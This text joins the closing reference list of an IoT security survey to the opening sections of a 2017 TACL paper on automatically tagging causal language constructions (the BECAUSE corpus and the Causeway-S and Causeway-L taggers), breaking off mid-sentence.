devices. [138] PERERA, C., JAYARAMAN, P. P., ZASLAVSKY, A., GEORGAKOPOULOS, D., AND CHRISTEN, P. Mosden: An internet of things middleware for resource constrained mobile devices. In System Sciences (HICSS), 2014 47th Hawaii International Conference on (2014), IEEE, pp. 1053–1062. [139] PERERA, C., AND VASILAKOS, A. V. A knowledge-based resource discovery for internet of things. Knowledge-Based Systems 109 (2016), 122–136. [140] PERRIG, A., SZEWCZYK, R., TYGAR, J., WEN, V., AND CULLER, D. E. Spins: Security protocols for sensor networks. Wireless networks 8, 5 (2002), 521–534. [141] PFLEEGER, C. P., AND PFLEEGER, S. L. Security in computing. Prentice Hall Professional Technical Reference, 2002. [142] PHAM, L. M., EL-RHEDDANE, A., DONSEZ, D., AND DE PALMA, N. Cirus: an elastic cloud- based framework for ubilytics. Annals of Telecommunications 71, 3-4 (2016), 133–140. 30/34 [143] POINT, C. Cpai-2014-2294 misfortune cookie. https://www.checkpoint.com/ defense/advisories/public/2014/cpai-2014-2294.html, 12 2014. (Accessed on 02/13/2017). [144] RADOMIROVIC, S. Towards a model for security and privacy in the internet of things. In Proc. First Int’l Workshop on Security of the Internet of Things (2010). [145] RAMACHANDRAN, G. S., DANIELS, W., PROENÇA, J., MICHIELS, S., JOOSEN, W., HUGHES, D., AND PORTER, B. Hitch hiker: A remote binding model with priority based data aggregation for wireless sensor networks. In Proceedings of the 18th International ACM SIGSOFT Symposium on Component-Based Software Engineering (2015), ACM, pp. 43–48. [146] RAZZAQUE, M. A., MILOJEVIC-JEVRIC, M., PALADE, A., AND CLARKE, S. Middleware for internet of things: a survey. IEEE Internet of Things Journal 3, 1 (2016), 70–95. [147] RENDLE, A. Who owns the data in the internet of things? http://www.taylorwessing. com/download/article\_data\_lot.html, 2014. (Visited on 06/08/2015). [148] RENNER, T., KLIEM, A., AND KAO, O. The device cloud-applying cloud computing concepts to the internet of things. In Ubiquitous Intelligence and Computing, 2014 IEEE 11th Intl Conf on and IEEE 11th Intl Conf on and Autonomic and Trusted Computing, and IEEE 14th Intl Conf on Scalable Computing and Communications and Its Associated Workshops (UTC-ATC-ScalCom) (2014), IEEE, pp. 396–401. [149] RESCORLA, E., AND MODADUGU, N. Datagram transport layer security. Tech. rep., 2006. [150] RIVEST, R. L., SHAMIR, A., AND ADLEMAN, L. A method for obtaining digital signatures and public-key cryptosystems. Communications of the ACM 21, 2 (1978), 120–126. [151] ROTONDI, D., SECCIA, C., AND PICCIONE, S. Access control & iot: Capability based authorization access control system. In 1st IoT International Forum, Berlin, November (2011). [152] RYAN, M. Bluetooth: With low energy comes low security. In WOOT (2013). [153] SADEGHI, A.-R., AND STÜBLE, C. Property-based attestation for computing platforms: caring about properties, not mechanisms. In Proceedings of the 2004 workshop on New security paradigms (2004), ACM, pp. 67–77. [154] SAINT-ANDRE, P. Extensible messaging and presence protocol (xmpp): Core. [155] SAKIMURA, N., BRADLEY, J., AND JONES, M. [156] SAKIMURA, N., BRADLEY, J., AND JONES, M. Openid connect dynamic client registration 1.0-draft 14, 2013. [157] SAMSUNG. Mobile Enterprise Security — Samsung KNOX. https://www.samsungknox. com/en, 2015. (Visited on 03/24/2015). [158] SCHNEIER, B. Tracking vehicles through tire pressure monitors. https://www.schneier. com/blog/archives/2008/04/tracking_vehicl.html, 4 2008. (Accessed on 02/13/2017). [159] SCHNEIER, B. iphone encryption and the return of the crypto wars. Schneier on Security 6 (2014), 2014. [160] SCUTURICI, V.-M., SURDU, S., GRIPAY, Y., AND PETIT, J.-M. Ubiware: Web-based dynamic data & service management platform for ami. In Proceedings of the Posters and Demo Track (2012), ACM, p. 11. [161] SEIGER, R., HUBER, S., AND SCHLEGEL, T. Toward an execution system for self-healing workflows in cyber-physical systems. Software & Systems Modeling (2016), 1–22. [162] SESHADRI, A., PERRIG, A., VAN DOORN, L., AND KHOSLA, P. Swatt: Software-based attestation for embedded devices. In Security and Privacy, 2004. Proceedings. 2004 IEEE Symposium on (2004), IEEE, pp. 272–282. [163] SETHI, M. Security in smart object networks. Master’s thesis, Aalto University, School of Science, 2012. 31/34 [164] SETHI, M., ARKKO, J., AND KERANEN, A. End-to-end security for sleepy smart object networks. In Local Computer Networks Workshops (LCN Workshops), 2012 IEEE 37th Conference on (2012), IEEE, pp. 964–972. [165] SHOR, P. W. Polynomial-time algorithms for prime factorization and discrete logarithms on a quantum computer. SIAM review 41, 2 (1999), 303–332. [166] SICARI, S., RIZZARDI, A., MIORANDI, D., CAPPIELLO, C., AND COEN-PORISINI, A. A secure and quality-aware prototypical architecture for the internet of things. Information Systems 58 (2016), 43–55. [167] SICARI, S., RIZZARDI, A., MIORANDI, D., CAPPIELLO, C., AND COEN-PORISINI, A. Security policy enforcement for networked smart objects. Computer Networks 108 (2016), 133–147. [168] SILAGHI, G. C., ARENAS, A., AND SILVA, L. M. Reputation-based trust management systems and their applicability to grids. Tech. Rep. TR-0064, Institutes on Knowledge and Data Management and System Architecture, CoreGRID - Network of Excellence, February 2007. [169] SIMMONDS, A., SANDILANDS, P., AND VAN EKERT, L. An ontology for network security attacks. In Applied Computing. Springer, 2004, pp. 317–323. [170] SKOROBOGATOV, S. The bumpy road towards iphone 5c nand mirroring. arXiv preprint arXiv:1609.04327 (2016). [171] SKOROBOGATOV, S. P. Semi-invasive attacks: a new approach to hardware security analysis. PhD thesis, Citeseer, 2005. [172] SOURSOS, S., ŽARKO, I. P., ZWICKL, P., GOJMERAC, I., BIANCHI, G., AND CARROZZO, G. Towards the cross-domain interoperability of iot platforms. In Networks and Communications (EuCNC), 2016 European Conference on (2016), IEEE, pp. 398–402. [173] SPIEKERMANN, S., AND CRANOR, L. F. Engineering privacy. IEEE Transactions on software engineering 35, 1 (2009), 67–82. [174] STEIL, M. 17 mistakes microsoft made in the xbox security system. In 22nd Chaos Communication Congr. (2005). [175] SVENSSON FORS, D., MAGNUSSON, B., GESTEGÅRD ROBERTZ, S., HEDIN, G., AND NILSSON- NYMAN, E. Ad-hoc composition of pervasive services in the palcom architecture. In Proceedings of the 2009 international conference on Pervasive services (2009), ACM, pp. 83–92. [176] TAJMAJER, T., LALIS, S., KOUTSOUBELIAS, M., PRUSZKOWSKI, A., DOMASZEWICZ, J., NATI, M., AND GLUHAK, A. Node/proxy portability: Designing for the two lives of your next wsan middleware. Journal of Systems and Software 117 (2016), 366–383. [177] TALAVERA, L. E., ENDLER, M., VASCONCELOS, I., VASCONCELOS, R., CUNHA, M., AND E SILVA, F. J. D. S. The mobile hub concept: Enabling applications for the internet of mobile things. In Pervasive Computing and Communication Workshops (PerCom Workshops), 2015 IEEE International Conference on (2015), IEEE, pp. 123–128. [178] TCG. Trusted computing group - home. http://www.trustedcomputinggroup.org/, 2015. (Visited on 06/08/2015). [179] TERZIYAN, V., KAYKOVA, O., AND ZHOVTOBRYUKH, D. Ubiroad: Semantic middleware for context-aware smart road environments. In Internet and Web Applications and Services (ICIW), 2010 Fifth International Conference on (2010), IEEE, pp. 295–302. [180] TINDALL, K. How bitcoin might fix the broken internet of things. https://freo.me/ 2jNZRBm, 3 2015. (Accessed on 01/20/2017). [181] TSCHOFENIG, H., AND FOSSATI, T. A tls/dtls 1.2 profile for the internet of things. draft-ietf-dice- profile-08 (work in progress) (2014). [182] TSCHOFENIG, H., MALER, E., WAHLSTROEM, E., AND ERDTMAN, S. Authentication and authorization for constrained environments using oauth and uma. https://tools.ietf.org/ html/draft-maler-ace-oauth-uma-00, 3 2015. (Accessed on 02/13/2017). [183] TURKMEN, F., AND CRISPO, B. Performance evaluation of xacml pdp implementations. In Proceedings of the 2008 ACM workshop on Secure web services (2008), ACM, pp. 37–44. 32/34 [184] TZIRITAS, N., GEORGAKOUDIS, G., LALIS, S., PACZESNY, T., DOMASZEWICZ, J., LAMPSAS, P., AND LOUKOPOULOS, T. Middleware mechanisms for agent mobility in wireless sensor and actuator networks. In International Conference on Sensor Systems and Software (2012), Springer, pp. 30–44. [185] UNGUREAN, I., GAITAN, N. C., AND GAITAN, V. G. A middleware based architecture for the industrial internet of things. KSII Transactions on Internet and Information Systems (TIIS) 10, 7 (2016), 2874–2891. [186] UNION, E. Reform of eu data protection rules - european commission. http://ec.europa. eu/justice/data-protection/reform/index_en.htm, 4 2016. [187] UNIVERSITY OF PORTSMOUTH LIBRARY. Discovery service. http://www.port.ac.uk/ library/infores/discovery/filetodownload,170883,en.xls, 2015. (Visited on 07/14/2015). [188] VASCONCELOS, R. O., TALAVERA, L., VASCONCELOS, I., RORIZ, M., ENDLER, M., GOMES, B. D. T. P., AND E SILVA, F. J. D. S. An adaptive middleware for opportunistic mobile sensing. In Distributed Computing in Sensor Systems (DCOSS), 2015 International Conference on (2015), IEEE, pp. 1–10. [189] VÁZQUEZ, A. G., SORIA-RODRIGUEZ, P., BISSON, P., GIDOIN, D., TRABELSI, S., AND SERME, G. Fi-ware security: future internet security core. In European Conference on a Service-Based Internet (2011), Springer, pp. 144–152. [190] VIEIRA, M. A. M., COELHO JR, C. N., DA SILVA JR, D. C., AND DA MATA, J. M. Survey on wireless sensor network devices. In Emerging Technologies and Factory Automation, 2003. Proceedings. ETFA’03. IEEE Conference (2003), vol. 1, IEEE, pp. 537–544. [191] VINCENT, J. London’s bins are tracking your smartphone. http:// www.independent.co.uk/life-style/gadgets-and-tech/news/ updated-londons-bins-are-tracking-your-smartphone-8754924.html, 8 2013. (Accessed on 02/13/2017). [192] WATRO, R., KONG, D., CUTI, S.-F., GARDINER, C., LYNN, C., AND KRUUS, P. Tinypk: securing sensor networks with public key technology. In Proceedings of the 2nd ACM workshop on Security of ad hoc and sensor networks (2004), ACM, pp. 59–64. [193] WEI, J. Ddos on internet of things–a big alarm for the future. [194] WINTER, J. S. Privacy and the emerging internet of things: using the framework of contextual integrity to inform policy. In Pacific Telecommunication Council Conference Proceedings 2012 (2012). [195] XU, X., LI, M., AND LIANG, J. A middleware for environmental monitoring and control. In Services Computing (SCC), 2016 IEEE International Conference on (2016), IEEE, pp. 697–704. [196] YAN, S. Y. Side-channel attacks. In Cryptanalytic Attacks on RSA. Springer, 2008, pp. 207–222. [197] YI, S., AND KRAVETS, R. Key management for heterogeneous ad hoc wireless networks. In Network Protocols, 2002. Proceedings. 10th IEEE International Conference on (2002), IEEE, pp. 202–203. [198] YUN, J., AHN, I.-Y., SUNG, N.-M., AND KIM, J. A device software platform for consumer electronics based on the internet of things. IEEE Transactions on Consumer Electronics 61, 4 (2015), 564–571. [199] ZEE. Fitbit users are unwittingly sharing details of their sex lives with the world, 2011. (Visited on 06/04/2013). [200] ZHILIANG, W., YI, Y., LU, W., AND WEI, W. A soa based iot communication middleware. In Mechatronic Science, Electric Engineering and Computer (MEC), 2011 International Conference on (2011), IEEE, pp. 2555–2558. [201] ZOURIDAKI, C., MARK, B. L., HEJMO, M., AND THOMAS, R. K. Hermes: A quantitative trust establishment framework for reliable data packet delivery in manets. Journal of Computer Security 15, 1 (2007), 3–38. 33/34 [202] ZOURIDAKI, C., MARK, B. L., HEJMO, M., AND THOMAS, R. K. E-hermes: A robust cooperative trust establishment scheme for mobile ad hoc networks. Ad Hoc Networks 7, 6 (2009), 1156–1168. 34/34 work_pikiwx2qgndj5avsy435cqccsm ---- Automatically Tagging Constructions of Causation and Their Slot-Fillers Jesse Dunietz Computer Science Department Carnegie Mellon University Pittsburgh, PA 15213, USA jdunietz@cs.cmu.edu Lori Levin and Jaime Carbonell Language Technologies Institute Carnegie Mellon University Pittsburgh, PA 15213, USA {lsl,jgc}@cs.cmu.edu Abstract This paper explores extending shallow seman- tic parsing beyond lexical-unit triggers, using causal relations as a test case. Semantic pars- ing becomes difficult in the face of the wide variety of linguistic realizations that causation can take on. We therefore base our approach on the concept of CONSTRUCTIONS from the linguistic paradigm known as CONSTRUCTION GRAMMAR (CxG). In CxG, a construction is a form/function pairing that can rely on arbi- trary linguistic and semantic features. Rather than codifying all aspects of each construc- tion’s form, as some attempts to employ CxG in NLP have done, we propose methods that offload that problem to machine learning. We describe two supervised approaches for tag- ging causal constructions and their arguments. Both approaches combine automatically in- duced pattern-matching rules with statistical classifiers that learn the subtler parameters of the constructions. Our results show that these approaches are promising: they significantly outperform naı̈ve baselines for both construc- tion recognition and cause and effect head matches. 1 Introduction Historically, shallow semantic parsing has focused on tagging predicates expressed by individual lexical units. While this paradigm has been fruitful, tying meaning to lexical units excludes some essential se- mantic relationships that cannot be captured in such a representation. One domain that highlights the problem is causal relations. Causation can be expressed in a tremen- 1. THIS BILL promotes consolidation and coopera- tion among regulatory agencies. 2. SUCH SWELLING can impede breathing. 3. WE DON’T HAVE MUCH TIME, so let’s move quickly. 4. She’s mad because I HID THE CAR KEYS. 5. He died from A BLOCKED ARTERY. 6. Making money is contingent on FINDING A GOOD-PAYING JOB. 7. THIS DECISION opens the way for much broader application of the law. 8. For market discipline to work, BANKS CANNOT EXPECT TO BE BAILED OUT. 9. Judy’s comments were SO OFFENSIVE that I left. Table 1: Examples of causal language, reflecting the anno- tation scheme described in §2.1 (with connectives in bold, CAUSES in small caps, and effects in italics). dous variety of linguistic forms (Wolff et al., 2005). As exemplified in Table 1, possibilities include verbs (1, 2), prepositions/conjunctions (3, 4, 5), adjectives (6), and much more complex expressions. Some of these trickier cases can be handled as idiomatic multi- word expressions (MWEs; 7). Others (8, 9), however, are more structured than typical MWEs: they depend on particular configurations of syntactic relations and slot-fillers, placing them closer to the grammatical end of the continuum of lexicon and grammar. This diversity presents a problem for most se- mantic parsers, which inherit the restrictions of the representational schemes they are based on. Many semantic annotation schemes limit themselves to the argument structures of particular word classes. For example, the Penn Discourse Treebank (PDTB; 117 Transactions of the Association for Computational Linguistics, vol. 5, pp. 117–133, 2017. Action Editor: Christopher Potts. Submission batch: 9/2016; Revision batch: 11/2016; Published 6/2017. c©2017 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. Prasad et al., 2008) includes only conjunctions and adverbials as connectives,1 and PropBank (Palmer et al., 2005) and VerbNet (Schuler, 2005) focus on verb arguments. FrameNet (Baker et al., 1998; Fill- more, 2012) is less restrictive, allowing many parts of speech as triggers. Most importantly, though, all these representations share the fundamental simplifying assumption that the basic linguistic carrier of meaning is the lexical unit. Some (e.g., PDTB and FrameNet) allow MWEs as lexical units, and much work has been done on detecting and interpreting MWEs (see Baldwin and Kim, 2010). But even these schemes overlook es- sential linguistic elements that encode meanings. In example 9, for instance, a lexical unit approach would have to treat so as encoding the causal relationship, when in fact so merely intensifies the adjective; it is the combination of so and the finite clausal comple- ment that indicates causality. A more general approach can be found in the prin- ciples of CONSTRUCTION GRAMMAR (CxG; Fill- more et al., 1988; Goldberg, 1995). CxG posits that the fundamental units of language are CONSTRUC- TIONS – pairings of meanings with arbitrarily com- plex linguistic forms. These forms are often produc- tive, consisting of some fixed elements combined with some open slots for semantic arguments. The form/meaning pairings can be as simple as those in traditional lexical semantics. The verb push, for in- stance, is paired with the meaning force to move, and the verb takes two linguistic arguments (sub- ject and object) corresponding to the two semantic arguments (pusher and pushee). But in CxG, the meaning-bearing forms can be much more complex: so X that Y is a single construction, paired with the meaning X to an extreme that causes Y. The CxG paradigm can anchor semantic interpre- tations to any constellation of surface forms, making it potentially invaluable for computational semantics. Even as it has grown in prominence in linguistics, however, CxG has received relatively little attention in NLP. This is partly because the usual approach to operationalizing CxG is to rebuild the entire NLP pipeline to be “constructions all the way down” – to 1PDTB does include a catch-all AltLex category that captures some additional constructions. However, these phrases are very unpredictable, as they include many words beyond the linguistic triggers. They are also restricted to relations between sentences. explicitly model the interactions and inheritance re- lationships between constructions that produce the final utterance and meaning. Here, we take a different approach. Instead of “constructions all the way down,” we propose a “CON- STRUCTIONS ON TOP” methodology: we use a con- ventional NLP pipeline for POS tagging, parsing, and so on, but add a layer for constructional phenomena that directly carry meaning. Rather than specifying by hand the constraints and properties that charac- terize each construction, we allow machine learning algorithms to learn these characteristics. Causal relations present an ideal testbed for this ap- proach. As noted above, causal relations are realized in extremely diverse ways, demanding an operational- ized concept of constructions. Recognizing causal relations also requires a combination of linguistic analysis and broader world knowledge. Additionally, causal relations are ubiquitous, both in our thinking and in our language (see, e.g., Conrath et al., 2014). Recognizing these relations is thus invaluable for many semantics-oriented applications, including tex- tual entailment and question answering (especially for “why” questions). They are especially helpful for domain-specific applications such as finance, politics, and biology (see, e.g., Berant et al., 2014), where ex- tracting cause and effect relationships can help drive decision-making. More general applications like ma- chine translation and summarization, which ought to preserve stated causal relationships, can also benefit. In the remainder of this paper, we suggest two related approaches for tagging causal constructions and their arguments. We first review an annotation scheme for causal language and present a new corpus annotated using that scheme (§2). We then define the task of tagging causal language, casting it as a construction recognition problem (§3). Because it is so hard to identify the relevant components of a construction (tenses, grammatical relations, etc.), the scheme and task do not explicitly include all of these elements. We instead tag the words that participate in a causal construction as a proxy for that construction. We leave it to annotators (when humans are annotat- ing) or machine learning (during automated tagging) to assess when the full constellation of constructional elements is present. Next, we present Causeway-L and Causeway-S, two versions of a pipeline for performing this task, 118 and compare the two approaches. Both approaches use automatically induced patterns, either syntactic (§4.1) or lexical (§4.2), to find possible lexical trig- gers of causal constructions, as well as their likely arguments. They then apply a mix of construction- specific classifiers and construction-independent clas- sifiers to determine when causal constructions are truly present. We report on three sets of experiments (§5) assessing the two systems’ performance, the im- pacts of various design features, and the effects of parsing errors. The results indicate the viability of the approach, and point to further work needed to improve construction recognition (§6). 2 Causal Language Annotation Scheme and Corpus Causation is a slippery notion (see Schaffer, 2014), so the parameters of annotating causal language require careful definition. We follow the annotation scheme of Dunietz et al. (2015), which we now briefly review. 2.1 Causal Language Annotation Scheme The scheme of Dunietz et al. (2015) focuses specifi- cally on causal language – language used to appeal to psychological notions of cause and effect. It is not concerned with what causal relationships hold in the real world; rather, it represents what causal relationships are asserted by the text. For example, cancer causes smoking states a false causation, but it would nonetheless be annotated. On the other hand, the bacon pizza is delicious would not be annotated, even though bacon may in fact cause deliciousness, because the causal relationship is not stated. The scheme defines causal language as any con- struction which presents one event, state, action, or entity as promoting or hindering another, and which includes at least one lexical trigger. For each instance of causal language, up to three spans are annotated: • The causal connective (required) – the lexical items in the construction signaling the causal rela- tionship (e.g., because of ). The connective anno- tation includes all words whose lemmas appear in every instance of the construction. This excludes elements that can be absent, such as most copu- las, or classes of interchangeable words, such as determiners, whose lemmas can vary between in- stances. • The cause – generally a full clause or phrase ex- pressing an event or state of affairs (e.g., I attended because Joan was the honoree). When an actor – but no action – is presented as the cause (e.g., I prevented a fire.), the actor is annotated as the cause. • The effect – also generally an event or state of affairs, expressed as a complete clause or phrase (e.g., I attended because of Joan.). The cause and effect spans may be absent, e.g., in a passive or infinitive. Several examples, with connectives, causes, and effects annotated, are shown in Table 1. The scheme permits the connective to be discon- tinuous and arbitrarily complex (e.g., a necessary condition of or if is to ). Annotators together established an informal “constructicon” to guide their decisions about what word patterns should be con- sidered connectives. Note that the connective is not synonymous with the construction itself; rather, it is a lexical indicator of the presence of the construction. As noted above, we take the construction proper to in- clude the relevant grammatical relations, constraints on argument type, etc. To address causal language as independently as possible from other phenomena, and to circumscribe the scope of the annotations, several types of relation- ships are excluded: • Causal relationships with no lexical trigger – e.g., John went home early; he felt ill. • Connectives that incorporate a means or result – this includes lexical causatives such as kill (cause to die) and convince (cause via persuasion). Only connectives denoting pure causation (e.g., cause, prevent, because) are annotated. • Connectives that assert an unspecified causal relationship – e.g., the earthquakes have been linked to fracking. • Temporal language – e.g., after I drank some wa- ter, I felt much better. (Relations like temporal or- der are often repurposed to express causality. We are currently developing an enhanced annotation scheme and corpus that accounts for such cases.) Additionally, for practical reasons, arguments are only annotated when they appear within the same sentence as the connective. 119 The scheme labels four different types of causa- tion: CONSEQUENCE, MOTIVATION, PURPOSE, and INFERENCE. It also distinguishes positive causation (FACILITATE) from negative causation (INHIBIT). Our algorithms do not currently make these distinc- tions, so we do not delve into them here. Of course, this scheme does not supply everything a full natural language understanding pipeline would need regarding causal relationships. The scheme does not unpack the argument spans into a richer semantic representation. It also does not cover predi- cates that imply causation, such as kill or convince. Instead, it follows in the tradition of shallow semantic parsing, imposing a canonical representation for cer- tain predicates that abstracts away from the language used to convey them. The shallow semantic pars- ing paradigm enables many applications that only require relevant text spans. It is also the first step towards a full semantic interpretation that includes interpretations of the arguments. 2.2 The BECAUSE Annotated Corpus Based on the data and annotation scheme from Duni- etz et al. (2015), we developed the Bank of Effects and Causes Stated Explicitly (BECAUSE), which was used for all experiments below. It consists of three sets of exhaustively annotated documents: • 59 randomly selected articles from the year 2007 in the Washington section of the New York Times corpus (Sandhaus, 2008) • 47 documents randomly selected from sections 2–23 of the Penn Treebank2 (Marcus et al., 1994) • 679 sentences3 transcribed from Congress’ Dodd- Frank hearings, taken from the NLP Unshared Task in PoliInformatics 2014 (Smith et al., 2014) The corpus contains a total of 4161 sentences, among which are 1099 labeled instances of causal language. 1004 of these, or 91%, include both cause and effect arguments. Many of these documents are the same ones that were annotated in Dunietz et al. (2015), with mi- nor corrections. About 75% of the data is new, but 2We excluded WSJ documents that were either earnings re- ports or corporate leadership/structure announcements, as both tended to be merely short lists of names/numbers. 3The remaining sentences and documents were not annotated due to constraints on available annotation effort. Partial overlap: Allowed Excluded Connectives (F1) 0.78 0.70 Degrees (κ) 1.0 1.0 Causation types (κ) 0.82 0.80 Argument spans (F1) 0.96 0.86 Argument labels (κ) 0.98 0.97 Table 2: Inter-annotator agreement results for the BE- CAUSE corpus. The difference between the two columns is that for the left column, we counted two annotation spans as a match if at least a quarter of the larger one overlapped with the smaller; for the right column, we re- quired an exact match. κ scores indicate Cohen’s kappa. Each κ score was calculated only for spans that agreed (e.g., degrees were only compared for matching connec- tive spans). Corpus Connectivetypes Connective tokens PDTB 8.9% 34.4% Mirza and Tonelli (2014) 29.3% 47.5% FrameNet 69.4% 66.9% Table 3: Percentages of the causal connectives in BE- CAUSE that would be partially or fully annotatable under other annotation schemes. Connectives were grouped into types by the sequence of connective lemmas. annotated by the same annotators. The scheme’s inter-annotator agreement metrics are reproduced in Table 2. Many of the causal constructions in BECAUSE would be harder to annotate in other schemes, as shown in Table 3. We computed these statistics by looking up each connective in the other schemes’ lexica. FrameNet captures many more connectives than the others, but it often represents them in frames that are not linked to causality, making comparison difficult. 3 The Causal Language Tagging Task We define the task of tagging causal language to be reproducing a subset of the annotations of the BECAUSE annotation scheme. We split this task into two parts: 1. Connective discovery, in which the spans of causal connectives are annotated. A connective 120 span may be any set of tokens from the sentence. This can be thought of as recognizing instantia- tions of causal constructions. 2. Argument identification (or argument ID), in which cause and effect spans are identified for each causal connective. This can be thought of as identifying the causal construction’s slot-fillers. We assume as input a set of sentences, each with POS tags, lemmas, NER tags, and a syntactic parse in the Universal Dependencies (UD; Nivre et al., 2016) scheme, all obtained from version 3.5.2 of the Stan- ford parser (Klein and Manning, 2003).4 This task is defined in terms of text spans. Still, to achieve a high score on it, a tagger must respond to the meaning of the construction and arguments in context, just as annotators do. This may be achieved by analyzing indirect cues that correlate with mean- ing, such as lexical information, dependency labels, and tense/aspect/modality information. Compared to the annotation scheme, the task is limited in two important ways: first, we do not dis- tinguish between types or degrees of causation; and second, we only tag instances where both the cause and the effect are present. (Even for connective dis- covery, we only evaluate on instances where both arguments are present, and our algorithms check for spans or tokens that at least could be arguments.) We leave addressing both limitations to future work. Nonetheless, this task is more difficult than it may appear. Two of the reasons for this are familiar is- sues in NLP. First, there is a surprisingly long tail of causal constructions (as we finished annotating, we 4We use the non-collapsed enhanced dependency represen- tation. We could have selected a parser that produces both syn- tactic and semantic structures, such as the English Resource Grammar (ERG; Copestake and Flickinger, 2000) or another HPSG variant. Though these parsers can produce impressively sophisticated analyses, we elected to use dependency parsers because they proved significantly more robust; there were many sentences in our corpus that we could not parse with ERG. How- ever, incorporating semantic information from such a system when it is available would be an interesting extension for future work. Another possible input would have been semantic role label- ing (SRL) tags. SRL tags could not form the basis of our system the way syntactic relations can, because they only apply to lim- ited classes of words (primarily verbs). Also, by examining syntactic relations and undoing passives (see §), we get most of the information SRL would provide. Still, we may include SRL tags as classification features in the future. would still encounter a new construction every 2–3 documents). Second, recognizing these constructions inherits all the difficulties of word sense disambigua- tion; every one of the connectives in Table 1 except examples 6 and 7 has a non-causal meaning. (4 can be used in a discourse sense – roughly, I’m saying this because. . . .) The third reason arises from the com- plexity of causal constructions. Because we allow arbitrarily complex connectives, the space of possible triggers is all subsets of words in the sentence. Thus, the task demands an approach that can trim this space down to a manageable size. 4 Causeway: Causal Construction Tagging Methods Causeway is a system that performs this causal lan- guage tagging task. We implemented two versions of Causeway: Causeway-S, based on syntactic patterns, and Causeway-L, based on lexical patterns. (These are both simple techniques; see §8 for some more complex possibilities we are considering for future work.) Each technique is implemented as a pipeline with four stages: 1. Pattern-based tentative connective discovery. Both techniques extract lexical or lexico-syntactic patterns for connectives from the training data. These patterns are then matched against each test sentence to find tokens that may be participating in a causal construction. 2. Argument identification, which marks the cause and effect spans. 3. A statistical filter to remove false matches. 4. A constraint-based filter to remove redundant connectives. Smaller connectives like to (which is causal in sentences like I left to get lunch)5 are usu- ally spurious when a larger connective includes the same word, like cause X to Y . When a larger and a smaller connective both make it through Stage 3 together, we remove the smaller one. Because argument ID is done before filtering, the arguments output by Stage 2 do not quite represent the cause and effect arguments of a causal instance. 5Following Schneider et al. (2015), BECAUSE considers the “in order to” usage of the infinitive to to carry lexical meaning beyond just marking an infinitival clause. 121 worry/VBP I/PRP nsubj care/VBP I/PRP nsubj because/IN mark advcl Figure 1: A UD parse for the sentence I worry because I care, with the tree fragment corresponding to the because construction bolded. Bolded nodes with unbolded text indicate the slots in the construction. (Care is a dependent of worry in keeping with the UD design philosophy, which maximizes dependencies between content words.) Rather, they represent what the cause and effect spans would be if the connective is indeed causal. (For the same reason, even connective discovery is not complete until the end of the pipeline.) Of course, we lack gold-standard arguments for false-positive connectives. We therefore train argument ID only on instances whose connectives are correct. We now describe each of the two versions of this pipeline in turn, focusing on their differing first and second stages. We also elaborate on the design of the classifier. Throughout, we take the head of a span to be the token that is highest in the dependency tree. For tokens that are equally high (e.g., if the parser erroneously splits a phrase into two sister subtrees), we prefer verbs or post-copular nouns over other nouns, and nouns over other parts of speech. 4.1 Causeway-S: Syntax-Based Tagging The syntax-based approach relies on a simple intu- ition: each causal construction corresponds, at least in part, to a fragment of a dependency tree, where several nodes’ lemmas and POS tags are fixed (see Figure 1). Accordingly, the first stage of Causeway-S induces lexico-syntactic patterns from the training data. At test time, it matches the patterns against new dependency trees to identify possible connectives and the putative heads of their cause and effect argu- ments. The second stage then expands these heads into complete argument spans. TRegex Pattern Matching For pattern matching, we use TRegex (Levy and Andrew, 2006), a grep-inspired utility for matching patterns against syntax trees. During training, the sys- tem examines each causal language instance, gener- ating a TRegex pattern that will match tree fragments with the same connective and argument structure. In the example from Figure 1, the generated pattern would match any tree meeting three conditions:6 • some token t1 has a child t2 via a dependency labeled advcl • t2 has a child t3 via a dependency labeled mark • t3 has the lemma because and a POS tag of IN At test time, TRegex matches these extracted pat- terns against the test sentences. Continuing with the same example, we would recover t1 as the effect head, t2 as the cause head, and {t3} as the connective. TRegex is designed for phrase-structure trees, so we transform each dependency tree into a PTB-like parenthetical notation (see Levin et al., 2014). Patterns involving verbs vary systematically: the verbs can become passives or verbal modifiers (e.g., the disaster averted last week), which changes the UD dependency relationships. To generalize across these, we crafted a set of scripts for TSurgeon (Levy and Andrew, 2006), a tree-transformation utility built on TRegex. The scripts normalize passive verbs and past participial modifiers into their active forms. Each sentence is transformed before pattern extrac- tion or matching. TRegex Pattern Extraction The algorithm for extracting TRegex patterns first preprocesses all training sentences with TSurgeon. Next, for each causal instance with both a cause and an effect, it uses the Dreyfus-Wagner algorithm (Dreyfus and Wagner, 1971) to find a minimum- weight subtree of the dependency graph that includes the connective, the cause head, and the effect head. The algorithm uses this to build the pattern: for each subtree edge rel(A,B), the pattern requires that the test sentence include nodes related by a dependency labeled as rel. If A or B is a connective word, then the pattern also checks for its lemma and POS in the test sentence nodes. Patterns with more than six non-argument, non-connective nodes are discarded as parse errors or otherwise ungeneralizable flukes. The graph for Dreyfus-Wagner includes a directed 6The actual TRegex pattern encoding these conditions is: /ˆbecause [0-9]+$/=connective 0 <2 /ˆIN.*/ <1 mark >(/.* [0- 9]+/=cause <1 advcl >(/.* [0-9]+/=effect)). 122 edge for each dependency in the sentence’s parse tree. For each edge, a back-edge of equal weight is added, unless the back-edge already exists (which UD allows). This allows Dreyfus-Wagner to find a subtree even when it has to follow an arc in reverse to do so. Most edges have unit weight. However, for nodes with multiple parents (which UD also allows), the algorithm would often choose the wrong dependency path, leading to poor generalization. Accordingly, on paths of the form x xcomp−−−→ y csubj | nsubj−−−−−−−→ z (where xcomp indicates open clausal complements), edge costs are slightly decreased. This helps the algorithm prefer the xcomp path connecting x, y, and z, rather than a path such as x nsubj−−−→ z nsubj←−−− y. Similarly, acl (adjectival clause) and expl (expletive) edges are slightly penalized. Syntax-Based Argument Identification Each syntactic pattern inherently encodes the posi- tions in the tree of the cause and effect heads. Thus, matching these patterns is the first step of argument ID, in addition to (tentative) connective discovery. The second step of argument ID is to expand the ar- gument heads into complete spans. In general, most syntactic dependents of an argument’s head are in- cluded in its span. There are two exceptions: 1. Connective words. Under the UD scheme, words that form part of the connective sometimes appear as dependents of the argument head. For example, in A prevents B from C, from appears as a depen- dent of C, but it is really part of the construction for the verb prevent. Following the annotation scheme, we therefore exclude such connective words (and any of their dependents) from the ar- gument span. 2. Words below the head of the other argument. For example, in A because B, B will be a depen- dent of A (see Figure 1). Obviously, however, it should not be included in the cause span. 4.2 Causeway-L: Lexical Pattern-Based Tagging Syntactic parsers often make mistakes, which be- comes especially relevant for syntactic patterns that examine multiple dependencies. This is particularly problematic for the syntax-based pipeline, for which parse errors, either in training or at 